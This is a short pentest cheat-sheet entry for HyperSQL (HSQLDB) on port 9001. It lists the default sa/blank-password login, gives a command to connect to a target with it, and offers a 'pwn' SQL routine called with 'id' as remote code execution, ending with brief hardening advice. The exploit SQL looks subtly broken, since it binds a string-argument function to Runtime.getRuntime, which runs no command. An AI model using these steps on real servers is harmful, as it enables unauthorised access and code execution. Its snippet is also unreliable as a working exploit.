HSQLDB
aka hypersql
HyperSQL, a Java database often on 9001. Default sa with a blank password is common, and because it can call Java methods from SQL, a logged-in user can reach java.lang.Runtime for RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
9001 | tcp | HSQLDB |
Fingerprint
- JDBC hsqldb banner; bundled with many Java apps
- nmap -sV identifies HSQLDB
Default / weak creds
sa / (blank) default
Exploitation primitives
- Default sa/blank login → full DB access
- Define a Java language routine and CALL it to run OS commands (RCE)
- Read/write server files via SQL where the bundled app allows
Overview
HSQLDB on 9001 is a pure-Java database. The hook is its ability to invoke Java from SQL — with the default sa account, that’s code execution.
Enumeration
Connect with the SQL tool (default sa/blank):
java -jar hsqldb.jar --url jdbc:hsqldb:hsql://<TARGET>:9001 --user sa --password ""RCE via a Java routine
CREATE FUNCTION pwn(IN cmd VARCHAR) RETURNS VARCHAR LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:java.lang.Runtime.getRuntime';
CALL pwn('id');Hardening
Set a strong sa password, run HSQLDB in-process (not as a network server) where possible, and disable Java language routines.